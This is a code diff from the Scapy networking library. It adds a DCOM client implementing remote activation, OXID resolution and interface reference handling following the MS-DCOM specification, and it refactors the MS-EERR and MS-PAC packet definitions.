host, port = self._ChoseRPCBinding(binds) + + super(DCOM_Client, self).connect( + host=host, + port=port, + timeout=timeout, ) - def connect(self, *args, **kwargs): - kwargs.setdefault("port", 135) - super(DCOM_Client, self).connect(*args, **kwargs) + def sr1_req(self, pkt, **kwargs): + raise NotImplementedError("Cannot use sr1_req on DCOM_Client !") + + def _GetObjectInstance(self, oid: int): + """ + Internal function to get an ObjectInstance from an oid + """ + return ObjectInstance( + client=self, + oid=oid, + ) - def ServerAlive2(self): + def _RemoteCreateInstanceOrGetClassObject( + self, + clsreq, + clsresp, + clsid: uuid.UUID, + iids: List[ComInterface], + ) -> ObjectInstance: """ - Call IObjectExporter::ServerAlive2 + Internal function common to RemoteCreateInstance and RemoteGetClassObject """ - self.bind_or_alter(find_dcerpc_interface("IObjectExporter")) - resp = self.sr1_req(ServerAlive2_Request(ndr64=False)) - binds, secs = _parseStringArray(resp.ppdsaOrBindings.value) - DCOMResults = collections.namedtuple("DCOMResults", ["addresses", "ssps"]) - addresses = [] - ssps = [] - for b in binds: - if b.wTowerId == 0: + if not iids: + raise ValueError("Must specify at least one interface !") + + # Bind IObjectExporter if not already + self.bind_or_alter(find_dcerpc_interface("IRemoteSCMActivator")) + + # [MS-DCOM] sect 3.1.2.5.2.3.3 - Issuing the Activation Request + + # Build the activation properties + ActivationProperties = [ + SpecialPropertiesData( + # Same as windows + dwDefaultAuthnLvl=self.auth_level, + dwOrigClsctx=16, + dwFlags=2, # ??? + ndr64=False, + ), + InstantiationInfoData( + classId=GUID(_uid_to_bytes(clsid)), + classCtx=16, + actvflags=0, + fIsSurrogate=0, + clientCOMVersion=COMVERSION( + MajorVersion=5, + MinorVersion=7, + ), + pIID=[GUID(_uid_to_bytes(x.uuid)) for x in iids], + ndr64=False, + ), + ActivationContextInfoData( + pIFDClientCtx=MInterfacePointer( + abData=OBJREF(iid=IID_IContext) + / OBJREF_CUSTOM( + clsid=CLSID_ContextMarshaler, + pObjectData=Context( + ContextId=uuid.UUID("53394e9f-e973-4bf0-a341-154519534fe1"), + Flags="CTXMSHLFLAGS_BYVAL", + ), + ), + ), + ndr64=False, + ), + SecurityInfoData( + pServerInfo=COSERVERINFO( + pwszName=self.host, + ), + ndr64=False, + ), + LocationInfoData(ndr64=False), + ScmRequestInfoData( + remoteRequest=customREMOTE_REQUEST_SCM_INFO( + pRequestedProtseqs=[ + # Note <51> for Windows Vista and later + int(DCERPC_Transport.NCACN_IP_TCP), + ] + ), + ndr64=False, + ), + ] + + # Build CustomHeader + hdr = CustomHeader( + pclsid=[ + GUID(_uid_to_bytes(CLSID_SpecialSystemProperties)), + GUID(_uid_to_bytes(CLSID_InstantiationInfo)), + GUID(_uid_to_bytes(CLSID_ActivationContextInfo)), + GUID(_uid_to_bytes(CLSID_SecurityInfo)), + GUID(_uid_to_bytes(CLSID_ServerLocationInfo)), + GUID(_uid_to_bytes(CLSID_ScmRequestInfo)), + ], + pSizes=[ + # Account for the size of the Type1 header + padding + len(x) + 16 + (-len(x) % 8) + for x in ActivationProperties + ], + ndr64=False, + ) + hdr.headerSize = len(hdr) + 16 # 16: size of the Type1 serialization header + hdr.totalSize = hdr.headerSize + sum(hdr.valueof("pSizes")) + + # Build final request + pkt = clsreq( + orpcthis=ORPCTHIS( + version=COMVERSION( + MajorVersion=5, + MinorVersion=7, + ), + flags=tagCPFLAGS.CPFLAG_PROPAGATE, + cid=self.cid, + ), + pActProperties=MInterfacePointer( + abData=OBJREF(iid=IID_IActivationPropertiesIn) + / OBJREF_CUSTOM( + clsid=CLSID_ActivationPropertiesIn, + pObjectData=ActivationPropertiesBlob( + CustomHeader=hdr, + Property=ActivationProperties, + ), + ), + ), + ndr64=False, + ) + + if isinstance(pkt, RemoteCreateInstance_Request): + pkt.pUnkOuter = None + + # Send and receive + resp = super(DCOM_Client, self).sr1_req(pkt) + if not resp or resp.status != 0: + raise ValueError("%s failed." % clsreq.__name__) + + entry = OXID_Entry() + objrefs = [] + + # [MS-DCOM] sect 3.2.4.1.1.3 - Updating the Client OXID Table after Activation + abData = OBJREF(resp.valueof("ppActProperties").abData) + for prop in abData.pObjectData.Property: + if ScmReplyInfoData in prop: + # Information about the object exporter the server found for us + remoteReply = prop[ScmReplyInfoData].valueof("remoteReply") + + # Get OXID, IPID, COMVERSION, authentication level hint + entry.oxid = remoteReply.Oxid + entry.version = remoteReply.serverVersion + entry.authnHint = DCE_C_AUTHN_LEVEL(remoteReply.authnHint) + entry.ipid_IRemUnknown = _uid_from_bytes( + bytes(remoteReply.ipidRemUnknown), ndrendian=remoteReply.ndrendian + ) + + # Set RPC bindings from the activation request + binds, _ = _ParseStringArray(remoteReply.valueof("pdsaOxidBindings")) + entry.bindingInfo = self._ChoseRPCBinding(binds) + + if PropsOutInfo in prop: + # Information about the interfaces that the client requested + info = prop[PropsOutInfo] + + # Check that all interfaces were obtained + phresults = info.valueof("phresults") + if any(x > 0 for x in phresults): + raise ValueError( + "Interfaces %s were not obtained !" + % [iids[i] for i, x in enumerate(phresults) if x > 0] + ) + + # Now store the object references for each interface + for i, ptr in enumerate(info.valueof("ppIntfData")): + if phresults[i] == 0: + objrefs.append(OBJREF(ptr.abData)) + else: + objrefs.append(None) + + # Update the OXID table + if entry.oxid not in self.OXID_table: + self.OXID_table[entry.oxid] = entry + + # Get oid + oid = objrefs[0].std.oid + + # Add an entry to the IPID table for the RemUnknown + if entry.ipid_IRemUnknown not in self.IPID_table: + ipid_entry = IPID_Entry() + ipid_entry.iface = self.IREMUNKNOWN + ipid_entry.iid = self.IREMUNKNOWN.uuid + ipid_entry.oxid = entry.oxid + ipid_entry.oid = oid + self.IPID_table[entry.ipid_IRemUnknown] = ipid_entry + + # "For each object reference returned from the activation request for + # which the corresponding status code indicates success, the client MUST + # unmarshal the object reference" + for i, obj in enumerate(objrefs): + if obj is None: continue - addresses.append(b.aNetworkAddr) - for b in secs: - ssps.append( - "%s%s" - % ( - b.sprintf("%wAuthnSvc%"), - b.aPrincName and "%s/" % b.aPrincName or "", + # Unmarshall + self._UnmarshallObjref(obj, iid=iids[i]) + + return self._GetObjectInstance(oid=oid) + + def _UnmarshallObjref( + self, + obj: OBJREF, + iid: Optional[ComInterface] = None, + ) -> int: + """ + [MS-DCOM] sect 3.2.4.1.2 - Unmarshaling an Object Reference + + :param iid: "IID specified by the application when unmarshalling the object + reference" (see [MS-DCOM] sect 4.5) + """ + # "If the OBJREF_STANDARD flag is set" + if OBJREF_STANDARD in obj and iid: + # "the client MUST look up the OXID entry in the OXID + # table using the OXID from the STDOBJREF" + try: + ox = self.OXID_table[obj.std.oxid] + except KeyError: + # "If the table entry is not found" + + # "determine the RPC binding information to be used" + binds, _ = _ParseStringArray(obj.saResAddr) + host, port = self._ChoseRPCBinding(binds) + + # "issue OXID resolution" + ox = self.ResolveOxid2(oxid=obj.std.oxid, host=host, port=port) + + # "Next, the client MUST update its tables" + self._UpdateTables(iid, ox, obj, obj.std) + + # "Finally, the client MUST compare the IID in the OBJREF with the + # IID specified by the application" + if obj.iid != iid.uuid: + # "First, the client SHOULD acquire an object reference of the IID + # specified by the application" + self.AcquireInterface( + ipid=obj.std.ipid, + iids=[ + iid, + ], + cPublicRefs=1, + ) + + # "Next, the client MUST release the object reference unmarshaled + # from the OBJREF" + self.RemRelease(obj.std.ipid) + + return obj.std.oid + else: + obj.show() + raise NotImplementedError("Non OBJREF_STANDARD ! Please report.") + + def _UpdateTables( + self, + iface: ComInterface, + ox: OXID_Entry, + obj: OBJREF, + std: STDOBJREF, + ) -> None: + """ + [MS-DCOM] 3.2.4.1.2.3 Updating Client Tables After Unmarshaling + """ + # [MS-DCOM] 3.2.4.1.2.3.1 Updating the OXID + if std.oxid not in self.OXID_table: + self.OXID_table[std.oxid] = ox + + # [MS-DCOM] 3.2.4.1.2.3.2 Updating the OID/IPID/Resolver + if std.ipid in self.IPID_table: + self.IPID_table[std.ipid].cPublicRefs += std.cPublicRefs + else: + entry = IPID_Entry() + entry.ipid = std.ipid + entry.oxid = std.oxid + entry.oid = std.oid + entry.iid = obj.iid + entry.iface = iface + entry.cPublicRefs = std.cPublicRefs + if entry.cPublicRefs == 0: + # "If the STDOBJREF contains a public reference count of zero, + # the client MUST obtain additional references on the interface" + raise NotImplementedError("Should acquire additional references !") + entry.cPrivateRefs = 0 + self.IPID_table[std.ipid] = entry + + if std.oid in self.OID_table: + oid_entry = self.OID_table[std.oid] + if std.ipid not in oid_entry.ipids: + oid_entry.ipids.append(std.ipid) + else: + binds, secs = _ParseStringArray(obj.saResAddr) + + oid_entry = OID_Entry() + oid_entry.oid = std.oid + oid_entry.oxid = std.oxid + oid_entry.ipids.append(std.ipid) + oid_entry.garbage_collection = not std.flags.SORF_NOPING + oid_entry.hash = _HashStringBinding(binds) + self.OID_table[std.oid] = oid_entry + + if oid_entry.hash not in self.Resolver_table: + resolver_entry = Resolver_Entry() + resolver_entry.setid = 0 + resolver_entry.hash = oid_entry.hash + resolver_entry.binds = binds + resolver_entry.secs = secs + self.Resolver_table[oid_entry.hash] = resolver_entry + + def _ChoseRPCBinding(self, bindings: List[STRINGBINDING]): + """ + [MS-DCOM] 3.2.4.1.2.1 - Determining RPC Binding Information for OXID Resolution + """ + # We don't try security bindings, only string ones (connection). + # We take the first valid one. + for binding in bindings: + # Only NCACN_IP_TCP is supported by DCOM + if binding.wTowerId == DCERPC_Transport.NCACN_IP_TCP: + # [MS-DCOM] 2.2.19.3 + m = re.match(r"(.*)\[(.*)\]", binding.aNetworkAddr) + if m: + host, port = m.group(1), int(m.group(2)) + else: + host, port = binding.aNetworkAddr, 135 + + # Check validity of the host/port tuple + if valid_ip6(host): + # IPv6 + pass + elif valid_ip(host): + # IPv4 + pass + else: + # Netbios/FQDN + try: + socket.gethostbyname(host) + except Exception: + # Resolution failed. Skip. + continue + + # Success + return host, port + raise ValueError("No valid bindings available !") + + def UnmarshallObjectReference( + self, mifaceptr: MInterfacePointer, iid: ComInterface + ): + """ + [MS-DCOM] 3.2.4.3 Marshaling an Object Reference + + Unmarshall a MInterfacePointer received by the applicative layer. + """ + oid = self._UnmarshallObjref(obj=OBJREF(mifaceptr.abData), iid=iid) + return self._GetObjectInstance(oid) + + def ResolveOxid2( + self, oxid: int, host: Optional[str] = None, port: Optional[int] = None + ): + """ + [MS-DCOM] 3.2.4.1.2.2 Issuing the OXID Resolution Request + + :param oxid: the OXID to resolve + :param host: (optional) connect to a different host + :param port: (optional) connect to a different port + """ + + if host == self.host and port == self.port: + host = self.host + port = self.port + client = self + else: + # Create and connect client + client = DCOM_Client( + # Note <85>: Windows uses INTEGRITY + auth_level=DCE_C_AUTHN_LEVEL.PKT_INTEGRITY, + ssp=self.ssp, + ) + client.connect(host, port=port) + + # Bind IObjectExporter if not already + client.bind_or_alter(find_dcerpc_interface("IObjectExporter")) + + try: + # Perform ResolveOxid2 + resp = super(DCOM_Client, client).sr1_req( + ResolveOxid2_Request( + pOxid=oxid, + arRequestedProtseqs=[ + DCERPC_Transport.NCACN_IP_TCP, + ], + ndr64=self.ndr64, ) ) - return DCOMResults(addresses, ssps) + finally: + if host != self.host or port != self.port: + client.close() + + # Entry + if oxid in self.OXID_table: + entry = self.OXID_table[oxid] + else: + entry = OXID_Entry() + + # Get OXID, IPID, COMVERSION, authentication level hint + entry.oxid = oxid + entry.version = resp.pComVersion + entry.authnHint = DCE_C_AUTHN_LEVEL(resp.pAuthnHint) + entry.ipid_IRemUnknown = _uid_from_bytes( + bytes(resp.pipidRemUnknown), ndrendian=resp.ndrendian + ) + + # Set RPC bindings from the oxid request + binds, _ = _ParseStringArray(resp.valueof("ppdsaOxidBindings")) + entry.bindingInfo = self._ChoseRPCBinding(binds) + + # Update the OXID table + if entry.oxid not in self.OXID_table: + self.OXID_table[entry.oxid] = entry + + return entry + + def RemoteCreateInstance( + self, clsid: uuid.UUID, iids: List[ComInterface] + ) -> ObjectInstance: + """ + Calls IRemoteSCMActivator::RemoteCreateInstance and returns a OXID_Entry + that points to an instance of the provided class. + + :param clsid: the class ID to initialize + :param iids: the IDs of the interfaces to request + """ + return self._RemoteCreateInstanceOrGetClassObject( + RemoteCreateInstance_Request, + RemoteCreateInstance_Response, + clsid, + iids, + ) + + def RemoteGetClassObject( + self, clsid: uuid.UUID, iids: List[ComInterface] + ) -> ObjectInstance: + """ + Calls IRemoteSCMActivator::RemoteGetClassObject and returns a OXID_Entry + that points to the factory. + + :param clsid: the class ID to initialize + :param iids: the IDs of the interfaces to request + """ + return self._RemoteCreateInstanceOrGetClassObject( + RemoteGetClassObject_Request, + RemoteGetClassObject_Response, + clsid, + iids, + ) + + def sr1_orpc_req( + self, + pkt: NDRPacket, + ipid: uuid.UUID, + ssp=None, + auth_level=None, + timeout=5, + **kwargs, + ): + """ + Make an ORPC call. + + :param ipid: the reference to a specific interface on an object. + :param pkt: the request to make. + + :param ssp: (optional) non default SSP to use to connect to the object exporter + :param auth_level: (optional) non default authn level to use + :param timeout: (optional) timeout for the connection + """ + # [MS-DCOM] sect 3.2.4.2 + + # 1. look up the object exporter information in the client tables + + try: + # "The client MUST use the IPID specified by the client application to + # look up the IPID entry in the IPID table." + ipid_entry = self.IPID_table[ipid] + except KeyError: + raise ValueError("The IPID that was passed is unknown.") + + # "The client MUST then look up the OXID entry" + oxid_entry = self.OXID_table[ipid_entry.oxid] + oid_entry = self.OID_table[ipid_entry.oid] + resolver_entry = self.Resolver_table[oid_entry.hash] + + # Get opnum + try: + opnum = pkt.overload_fields[DceRpc5Request]["opnum"] + except KeyError: + raise ValueError("This packet is not part of a registered COM interface !") + + # Build ORPC request + + if resolver_entry.client is None: + # We don't have a client ready, make one. + resolver_entry.client = DCERPC_Client( + DCERPC_Transport.NCACN_IP_TCP, + ssp=ssp or self.ssp, + auth_level=auth_level or oxid_entry.authnHint, + verb=self.verb, + ) + + resolver_entry.client.connect( + host=oxid_entry.bindingInfo[0], + port=oxid_entry.bindingInfo[1], + timeout=timeout, + ) + + # Bind the COM interface + resolver_entry.client.bind_or_alter(ipid_entry.iface) + + # We need to set the NDR very late, after the bind + pkt.ndr64 = resolver_entry.client.ndr64 + + # "The ORPCTHIS and ORPCTHAT structures MUST be marshaled using + # the NDR [2.0] Transfer Syntax" + pkt = ( + ORPCTHIS( + version=oxid_entry.version, + cid=self.cid, + ndr64=False, + ) + / pkt + ) + + # Send/Receive ! + resp = resolver_entry.client.sr1_req( + pkt, + opnum=opnum, + objectuuid=ipid, + **kwargs, + ) + + return resp[ORPCTHAT].payload + + def AcquireInterface( + self, + ipid: uuid.UUID, + iids: List[ComInterface], + cPublicRefs: int, + ): + """ + [MS-DCOM] 3.2.4.4.3 - Acquiring Additional Interfaces on the Object + """ + # 1. Look up the OID entry + ipid_entry = self.IPID_table[ipid] + oxid_entry = self.OXID_table[ipid_entry.oxid] + + # 2. Perform call + resp = self.sr1_orpc_req( + ipid=oxid_entry.ipid_IRemUnknown, + pkt=RemQueryInterface_Request( + ripid=GUID(_uid_to_bytes(ipid)), + cRefs=cPublicRefs, + cIids=len(iids), + iids=[GUID(_uid_to_bytes(x.uuid)) for x in iids], + ), + ) + + # 3. Process answer + if not resp or resp.status != 0: + raise ValueError + + # "When the call returns successfully..." + for i, remqir in enumerate(resp.valueof("ppQIResults")): + self._UnmarshallObjref( + OBJREF(iid=iids[i].uuid) + / OBJREF_STANDARD(std=STDOBJREF(bytes(remqir.std))), + iid=iids[i], + ) + + def RemRelease(self, ipid: uuid.UUID): + """ + 3.2.4.4.2 Releasing Reference Counts on an Interface + """ + + # 1. Look up the OID entry + ipid_entry = self.IPID_table[ipid] + oxid_entry = self.OXID_table[ipid_entry.oxid] + oid_entry = self.OID_table[ipid_entry.oid] + + # 2. Perform call + resp = self.sr1_orpc_req( + ipid=oxid_entry.ipid_IRemUnknown, + pkt=RemRelease_Request( + InterfaceRefs=[ + REMINTERFACEREF( + ipid=GUID(_uid_to_bytes(ipid)), + cPublicRefs=ipid_entry.cPublicRefs, + cPrivateRefs=ipid_entry.cPrivateRefs, + ) + ], + ), + ) + + # 3. Process answer + if resp and resp.status == 0: + # "When the call returns successfully..." + # "It MUST remove the IPID entry from the IPID table." + del self.IPID_table[ipid] + + # "It MUST remove the IPID from the IPID list in the OID entry." + oid_entry.ipids.remove(ipid) + + # "If the IPID list of the OID entry is empty, it MUST remove the + # OID entry from the OID table." + if not oid_entry.ipids: + del self.OID_table[ipid_entry.oid] + + +def ServerAlive2(host, timeout=5) -> Tuple[List[STRINGBINDING], List[SECURITYBINDING]]: + """ + Call IObjectExporter::ServerAlive2 + """ + client = DCERPC_Client( + transport=DCERPC_Transport.NCACN_IP_TCP, + verb=False, + ndr64=False, + # "The client MUST NOT specify security on the call" + auth_level=DCE_C_AUTHN_LEVEL.NONE, + ) + client.connect(host, port=135, timeout=timeout) + + # Bind IObjectExporter if not already + client.bind_or_alter(find_dcerpc_interface("IObjectExporter")) + + # Send ServerAlive2 request + resp = client.sr1_req(ServerAlive2_Request(ndr64=False), timeout=timeout) + if not resp or resp.status != 0: + raise ValueError("ServerAlive2 failed !") + + # Parse bindings and security options + return _ParseStringArray(resp.ppdsaOrBindings.value) diff --git a/scapy/layers/msrpce/mseerr.py b/scapy/layers/msrpce/mseerr.py index 7c32fe21fc8..4c08204e8d8 100644 --- a/scapy/layers/msrpce/mseerr.py +++ b/scapy/layers/msrpce/mseerr.py @@ -10,191 +10,20 @@ # Wireshark does not know how to read this ! import uuid -from enum import IntEnum -from scapy.fields import StrFixedLenField, UTCTimeField +from scapy.fields import UTCTimeField +from scapy.packet import Packet, bind_layers + from scapy.layers.dcerpc import ( DceRpc5Fault, DceRpc5BindNak, - NDRConfPacketListField, - NDRConfStrLenField, - NDRConfStrLenFieldUtf16, - NDRFullEmbPointerField, - NDRInt3264EnumField, - NDRIntField, - NDRPacket, - NDRPacketField, - NDRRecursiveField, NDRSerializeType1PacketField, - NDRShortField, - NDRSignedShortField, - NDRUnionField, - NDRLongField, +) +from scapy.layers.msrpce.raw.ms_eerr import ( + ExtendedErrorInfo, + EEComputerNamePresent, ) from scapy.layers.smb2 import STATUS_ERREF -from scapy.packet import Packet, bind_layers - -# [MS-EERR] structures - - -class EEAString(NDRPacket): - ALIGNMENT = (4, 8) - fields_desc = [ - NDRSignedShortField("nLength", None, size_of="pString"), - NDRFullEmbPointerField( - NDRConfStrLenField("pString", "", size_is=lambda pkt: pkt.nLength), - ), - ] - - -class EEUString(NDRPacket): - ALIGNMENT = (4, 8) - fields_desc = [ - NDRSignedShortField("nLength", None, size_of="pString"), - NDRFullEmbPointerField( - NDRConfStrLenFieldUtf16("pString", "", size_is=lambda pkt: pkt.nLength), - ), - ] - - -class BinaryEEInfo(NDRPacket): - ALIGNMENT = (4, 8) - fields_desc = [ - NDRSignedShortField("nSize", None, size_of="pBlob"), - NDRFullEmbPointerField( - NDRConfStrLenField("pBlob", "", size_is=lambda pkt: pkt.nSize), - ), - ] - - -class ExtendedErrorParamTypesInternal(IntEnum): - eeptiAnsiString = 1 - eeptiUnicodeString = 2 - eeptiLongVal = 3 - eeptiShortValue = 4 - eeptiPointerValue = 5 - eeptiNone = 6 - eeptiBinary = 7 - - -class ExtendedErrorParam(NDRPacket): - ALIGNMENT = (8, 8) - fields_desc = [ - NDRInt3264EnumField("Type", 0, ExtendedErrorParamTypesInternal), - NDRUnionField( - [ - ( - NDRPacketField("value", EEAString(), EEAString), - ( - (lambda pkt: getattr(pkt, "Type", None) == 1), - (lambda _, val: val.tag == 1), - ), - ), - ( - NDRPacketField("value", EEUString(), EEUString), - ( - (lambda pkt: getattr(pkt, "Type", None) == 2), - (lambda _, val: val.tag == 2), - ), - ), - ( - NDRIntField("value", 0), - ( - (lambda pkt: getattr(pkt, "Type", None) == 3), - (lambda _, val: val.tag == 3), - ), - ), - ( - NDRSignedShortField("value", 0), - ( - (lambda pkt: getattr(pkt, "Type", None) == 4), - (lambda _, val: val.tag == 4), - ), - ), - ( - NDRLongField("value", 0), - ( - (lambda pkt: getattr(pkt, "Type", None) == 5), - (lambda _, val: val.tag == 5), - ), - ), - ( - StrFixedLenField("value", "", length=0), - ( - (lambda pkt: getattr(pkt, "Type", None) == 6), - (lambda _, val: val.tag == 6), - ), - ), - ( - NDRPacketField("value", BinaryEEInfo(), BinaryEEInfo), - ( - (lambda pkt: getattr(pkt, "Type", None) == 7), - (lambda _, val: val.tag == 7), - ), - ), - ], - StrFixedLenField("value", "", length=0), - align=(2, 8), - switch_fmt=("H", "I"), - ), - ] - - -class EEComputerNamePresent(IntEnum): - eecnpPresent = 1 - eecnpNotPresent = 2 - - -class EEComputerName(NDRPacket): - ALIGNMENT = (4, 8) - fields_desc = [ - NDRInt3264EnumField("Type", 0, EEComputerNamePresent), - NDRUnionField( - [ - ( - NDRPacketField("value", EEUString(), EEUString), - ( - (lambda pkt: getattr(pkt, "Type", None) == 1), - (lambda _, val: val.tag == 1), - ), - ), - ( - StrFixedLenField("value", "", length=0), - ( - (lambda pkt: getattr(pkt, "Type", None) == 2), - (lambda _, val: val.tag == 2), - ), - ), - ], - StrFixedLenField("value", "", length=0), - align=(2, 8), - switch_fmt=("H", "I"), - ), - ] - - -class ExtendedErrorInfo(NDRPacket): - ALIGNMENT = (8, 8) - DEPORTED_CONFORMANTS = ["Params"] - fields_desc = [ - NDRRecursiveField("Next"), - NDRPacketField("ComputerName", EEComputerName(), EEComputerName), - NDRIntField("ProcessID", 0), - NDRLongField("TimeStamp", 0), - NDRIntField("GeneratingComponent", 0), - NDRIntField("Status", 0), - NDRShortField("DetectionLocation", 0), - NDRShortField("Flags", 0), - NDRSignedShortField("nLen", None, size_of="Params"), - NDRConfPacketListField( - "Params", - [], - ExtendedErrorParam, - size_is=lambda pkt: pkt.nLen, - conformant_in_struct=True, - ), - ] - # Encapsulation packets @@ -595,6 +424,7 @@ class DceRpc5ExtendedErrorInfo(Packet): "extended_error", ExtendedErrorInfo(), ExtendedErrorInfo, + ptr_pack=True, ) ] @@ -603,7 +433,7 @@ def show(self) -> None: Print stacktrace """ # Get a list of ErrorInfo - cur = self.extended_error.value + cur = self.extended_error errors = [cur] while cur and cur.Next: cur = cur.Next.value diff --git a/scapy/layers/msrpce/mspac.py b/scapy/layers/msrpce/mspac.py index b4e17fa7dcc..6185673c804 100644 --- a/scapy/layers/msrpce/mspac.py +++ b/scapy/layers/msrpce/mspac.py @@ -20,8 +20,8 @@ FieldListField, FlagsField, LEIntEnumField, - LELongField, LEIntField, + LELongField, LEShortField, MultipleTypeField, PacketField, @@ -31,6 +31,7 @@ StrFixedLenField, StrLenFieldUtf16, UTCTimeField, + UUIDField, XStrField, XStrLenField, ) @@ -616,7 +617,7 @@ class _CLAIMSClaimSet(_NDRConfField, NDRSerializeType1PacketLenField): def m2i(self, pkt, s): if pkt.usCompressionFormat == CLAIMS_COMPRESSION_FORMAT.COMPRESSION_FORMAT_NONE: - return ndr_deserialize1(s, CLAIMS_SET, ndr64=False) + return ndr_deserialize1(s, CLAIMS_SET, ptr_pack=True) else: # TODO: There are 3 funky compression formats... see sect 2.2.18.4 return NDRConformantString(value=s) @@ -624,7 +625,7 @@ def m2i(self, pkt, s): def i2m(self, pkt, val): val = val[0] if pkt.usCompressionFormat == CLAIMS_COMPRESSION_FORMAT.COMPRESSION_FORMAT_NONE: - return ndr_serialize1(val) + return ndr_serialize1(val, ptr_pack=True) else: # funky return bytes(val) @@ -755,16 +756,27 @@ class PAC_ATTRIBUTES_INFO(Packet): _PACTYPES[0x11] = PAC_ATTRIBUTES_INFO -# sect 2.15 - PAC_REQUESTOR +# sect 2.15 - PAC_REQUESTOR_SID -class PAC_REQUESTOR(Packet): +class PAC_REQUESTOR_SID(Packet): fields_desc = [ PacketField("Sid", WINNT_SID(), WINNT_SID), ] -_PACTYPES[0x12] = PAC_REQUESTOR +_PACTYPES[0x12] = PAC_REQUESTOR_SID + +# sect 2.16 - PAC_REQUESTOR_GUID + + +class PAC_REQUESTOR_GUID(Packet): + fields_desc = [ + UUIDField("Guid", None), + ] + + +_PACTYPES[0x14] = PAC_REQUESTOR_GUID # sect 2.3 @@ -781,7 +793,7 @@ def addfield(self, pkt, s, val): x = self.i2m(pkt, v) pay = pkt.Payloads[i] if isinstance(pay, NDRPacket) or isinstance(pay, NDRSerialization1Header): - lgth = len(ndr_serialize1(pay)) + lgth = len(ndr_serialize1(pay, ptr_pack=True)) else: lgth = len(pay) if v.cbBufferSize is None: @@ -797,7 +809,7 @@ def addfield(self, pkt, s, val): class _PACTYPEPayloads(PacketListField): def i2m(self, pkt, val): if isinstance(val, NDRPacket) or isinstance(val, NDRSerialization1Header): - s = ndr_serialize1(val) + s = ndr_serialize1(val, ptr_pack=True) else: s = bytes(val) return s + b"\x00" * ((-len(s)) % 8) @@ -806,8 +818,7 @@ def getfield(self, pkt, s): if not pkt or not s: return s, [] result = [] - for i in range(len(pkt.Buffers)): - buf = pkt.Buffers[i] + for buf in pkt.Buffers: offset = buf.Offset - 16 * len(pkt.Buffers) - 8 try: cls = _PACTYPES[buf.ulType] @@ -818,7 +829,7 @@ def getfield(self, pkt, s): val = ndr_deserialize1( s[offset : offset + buf.cbBufferSize], cls, - ndr64=False, + ptr_pack=True, ) else: val = cls(s[offset : offset + buf.cbBufferSize]) diff --git a/scapy/layers/msrpce/raw/ms_dcom.py b/scapy/layers/msrpce/raw/ms_dcom.py index 3cfe8c92be4..33240f3601e 100644 --- a/scapy/layers/msrpce/raw/ms_dcom.py +++ b/scapy/layers/msrpce/raw/ms_dcom.py @@ -3,14 +3,20 @@ # See https://scapy.net/ for more information # Copyright (C) Gabriel Potter -# ms-dcom.idl compiled on 06/07/2025 -# This file is a stripped version ! Use scapy-rpc for the full. +# [ms-dcom] v25.0 (Mon, 16 Sep 2024) + """ RPC definitions for the following interfaces: +- IActivation (v0.0): 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57 +- IRemoteSCMActivator (v0.0): 000001A0-0000-0000-C000-000000000046 - IObjectExporter (v0.0): 99fcfec4-5260-101b-bbcb-00aa0021347a +- IUnknown (v0.0): 00000000-0000-0000-C000-000000000046 +- IRemUnknown (v0.0): 00000131-0000-0000-C000-000000000046 +- IRemUnknown2 (v0.0): 00000143-0000-0000-C000-000000000046 This file is auto-generated by midl-to-scapy, do not modify. """ +from enum import IntEnum import uuid from scapy.fields import StrFixedLenField @@ -25,6 +31,7 @@ NDRConfVarStrNullFieldUtf16, NDRFullEmbPointerField, NDRFullPointerField, + NDRInt3264EnumField, NDRIntField, NDRLongField, NDRPacketField, @@ -40,6 +47,12 @@ class COMVERSION(NDRPacket): fields_desc = [NDRShortField("MajorVersion", 0), NDRShortField("MinorVersion", 0)] +class tagCPFLAGS(IntEnum): + CPFLAG_PROPAGATE = 1 + CPFLAG_EXPOSE = 2 + CPFLAG_ENVOY = 4 + + class GUID(NDRPacket): ALIGNMENT = (4, 4) fields_desc = [ @@ -73,10 +86,11 @@ class ORPC_EXTENT_ARRAY(NDRPacket): NDRFullEmbPointerField( NDRConfPacketListField( "extent", - [ORPC_EXTENT()], + [], ORPC_EXTENT, size_is=lambda pkt: ((pkt.size + 1) & (~1)), - ), + ptr_pack=True, + ) ), ] @@ -85,11 +99,11 @@ class ORPCTHIS(NDRPacket): ALIGNMENT = (4, 8) fields_desc = [ NDRPacketField("version", COMVERSION(), COMVERSION), - NDRIntField("flags", 0), + NDRInt3264EnumField("flags", 0, tagCPFLAGS), NDRIntField("reserved1", 0), NDRPacketField("cid", GUID(), GUID), NDRFullEmbPointerField( - NDRPacketField("extensions", ORPC_EXTENT_ARRAY(), ORPC_EXTENT_ARRAY), + NDRPacketField("extensions", ORPC_EXTENT_ARRAY(), ORPC_EXTENT_ARRAY) ), ] @@ -110,7 +124,7 @@ class ORPCTHAT(NDRPacket): fields_desc = [ NDRIntField("flags", 0), NDRFullEmbPointerField( - NDRPacketField("extensions", ORPC_EXTENT_ARRAY(), ORPC_EXTENT_ARRAY), + NDRPacketField("extensions", ORPC_EXTENT_ARRAY(), ORPC_EXTENT_ARRAY) ), ] @@ -130,6 +144,172 @@ class DUALSTRINGARRAY(NDRPacket): ] +class RemoteActivation_Request(NDRPacket): + fields_desc = [ + NDRPacketField("ORPCthis", ORPCTHIS(), ORPCTHIS), + NDRPacketField("Clsid", GUID(), GUID), + NDRFullPointerField(NDRConfVarStrNullFieldUtf16("pwszObjectName", "")), + NDRFullPointerField( + NDRPacketField("pObjectStorage", MInterfacePointer(), MInterfacePointer) + ), + NDRIntField("ClientImpLevel", 0), + NDRIntField("Mode", 0), + NDRIntField("Interfaces", None, size_of="pIIDs"), + NDRConfPacketListField("pIIDs", [], GUID, size_is=lambda pkt: pkt.Interfaces), + NDRShortField("cRequestedProtseqs", None, size_of="aRequestedProtseqs"), + NDRConfFieldListField( + "aRequestedProtseqs", + [], + NDRShortField("", 0), + size_is=lambda pkt: pkt.cRequestedProtseqs, + ), + ] + + +class RemoteActivation_Response(NDRPacket): + fields_desc = [ + NDRPacketField("ORPCthat", ORPCTHAT(), ORPCTHAT), + NDRLongField("pOxid", 0), + NDRFullPointerField( + NDRPacketField("ppdsaOxidBindings", DUALSTRINGARRAY(), DUALSTRINGARRAY) + ), + NDRPacketField("pipidRemUnknown", GUID(), GUID), + NDRIntField("pAuthnHint", 0), + NDRPacketField("pServerVersion", COMVERSION(), COMVERSION), + NDRSignedIntField("phr", 0), + NDRConfPacketListField( + "ppInterfaceData", + [], + MInterfacePointer, + size_is=lambda pkt: pkt.Interfaces, + ptr_pack=True, + ), + NDRConfFieldListField( + "pResults", [], NDRSignedIntField("", 0), size_is=lambda pkt: pkt.Interfaces + ), + NDRIntField("status", 0), + ] + + 